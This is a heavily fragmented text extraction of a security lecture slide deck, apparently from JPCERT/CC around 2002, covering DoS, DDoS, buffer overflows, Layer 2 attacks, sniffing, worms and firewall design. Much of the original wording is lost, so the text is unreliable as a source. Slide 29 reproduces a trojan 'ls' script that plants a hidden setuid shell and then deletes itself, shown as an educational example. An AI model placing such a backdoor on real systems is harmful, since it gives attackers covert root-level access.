JPCERT/CC 1
Firewall 2
Security Incident 3
Cgi-bin Cross Site Scripting (CSS) 4
Statistics@JPCERT/CC [chart: Number of Reports per period, 1996Q4 through 2002] 5
2002 JPCERT/CC 6
Port Scanning & Probe. Port scanning shellcode SPAM Denial of Services (DoS) DoS 7
48 bugtraq WWW IRC 8
DoS Excessive traffic / request generator WWW IRC Layer2 Public access 9
SPAM DoS Virus 10
Buffer Overflow Attack wuftp, Netscape Enterprise Server, Microsoft IIS, ... (boundary check) Internet Worm (1988) 11
Buffer Overflow Attack Buffer ( ) Boundary Check 12
Buffer Overflow Attack Buffer 13
Buffer Overflow Attack Coding rule Code management process Testing process 14
DoS Denial of Service Attack IP Source IP address spoofing IP traceback 15
DDoS Distributed DoS Attack DoS 2000 2 : Yahoo CNN ebay, Amazon DDoS 1999 8 trinoo DDoS FBI ISP 16
DDoS Zombie 1. 2. trigger 17
DDoS (root DNS) 2002 11 13 root DNS server. DoS. 18
Smurf Attack 19
CodeRed Nimda 20
DoS WIDE Project 600Mbps 10 PC L3 DoS 21
Out-band Management L3SW/router Management Center 22
Out-band Management L3SW OS OS L3SW VLAN 23
Layer 2 Layer 2 Public access 24
MAC address MAC address filtering MAC address Layer 2 MAC Ethernet Ethernet L2 25
Layer 2 Layer2 MAC MAC address flooding 26
Layer 2. Layer 2 SW MAC SNMP 27
(shell) (malicious code) (backdoor) wuftp 28
PATH=.:/usr/ucb:/usr/bin:/bin
% cat ./ls
#!/bin/sh
cp /bin/csh /tmp/hidden/csh$$
chmod 4711 /tmp/hidden/csh$$
/bin/ls $*
/bin/rm -f ./ls 2>&1 > /dev/null
% 29
root tcpdump (clear text) 30
ssh SSL/TLS Web E-Commerce IPsec VPN (Virtual Private Network) 2 e.g. 31
(3) Tapping Device Linux Ethernet Software Snooper Internet café Plathome Open Box, Internet café Firewall, DHCP server 32
2003 3 6, asahi.com Software snooper Keyboard Anonymous mail free mail) 2 33
Packet sniffer 34
/etc/passwd cracking software crack tuning Social Engineering Attack 35
Email Spoofing SPAM From Email Bombardment 36
SPAM SPAM (malicious code) SPAM Professional spammer SPAM / one-to-one marketing CAUCE (www.cause.org) 37
IP spoofing 38
Virus Love-Letter.txt CodeRed, CodeRed-II, Nimda, W32.Klez, ... 39
OS Solaris sadmind buffer overflow sadmind Solaris Worm Worm Windows IIS IIS IIS 40
CodeRed 41
End user computer. 43
(audit) 46
Integrity management 47
CISO (Chief Information and Security Officer) CISO 48
HRM (Human Resource Management) and other RM Public Relations and Publicity activities. 49
Honeypot firewall Load splitting (DoS (DoS IDS, virus check,. Monitoring & analysis Out-band management 52
Wire-speed 1Gbps IPv6 dual stack architecture IDS false alert S/N IDS? 53
High performance FW (1) Quarantine zone L2 LB L2 SW L3 Routing (traffic marking) (10G bb) 54
High performance FW (2) Quarantine Quarantine Quarantine Honey pot Management Center 55
Multifunctional FW Firewall Intranet VPN/SSH gateway SMTP forwarder Other App. gateway 56
: IDS SMTP virus check WWW contents filtering monitoring (10G bb) 57
FW, IDS 58
Pass authenticated traffic only VPN demarcation point Internal demarcation (VPN) External network (Internet) VPN relay (non-vpn) 59
Out-band Management L3SW/router Management Center 60
ToDo items 62